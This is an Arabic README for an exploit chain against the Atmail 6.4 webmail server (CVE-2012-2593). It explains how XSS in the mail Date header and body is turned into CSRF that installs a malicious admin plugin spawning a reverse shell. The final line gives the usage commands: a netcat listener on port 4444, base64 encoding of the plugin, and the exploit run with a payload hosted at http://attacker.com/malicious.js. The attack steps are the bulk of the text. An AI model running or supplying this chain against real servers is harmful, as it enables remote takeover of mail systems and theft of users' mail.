
سلسلة استغلال XSS-CSRF-RCE في Atmail
atmail-rce.py: يستغل CVE-2012-2593 في واجهة البريد الإلكتروني لـ Atmail.
atmail-csrf.js: ملف جافاسكريبت يستخدم CVE 2012-2593 لتحويلها إلى CSRF لتثبيت إضافة ضارة تنفذ شيل عكسي
Plugin.php: إضافة Atmail سيتم تثبيتها تستدعي شيل عكسي
!!استخدم فقط ضد خوادم لديك إذن لاختبارها
يحتوي خادم البريد الإلكتروني Atmail الإصدار 6.4 على ثغرة XSS في كل من رأس البريد Date وجسم البريد (عبر حقن iFrame). يتم استغلال هذه الثغرة لتحويلها إلى CSRF باستخدام واجهة برمجة تطبيقات XHR في جافاسكريبت لإرسال طلب يحمل ملف تعريف الارتباط الخاص بالمستخدم المسؤول إلى لوحة الإدارة، لتثبيت إضافة ضارة تنفذ كودًا لشيل عكسي.
nc -lvp 4444gzip -c Plugin.php | base64 | tr -d [:space:]python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/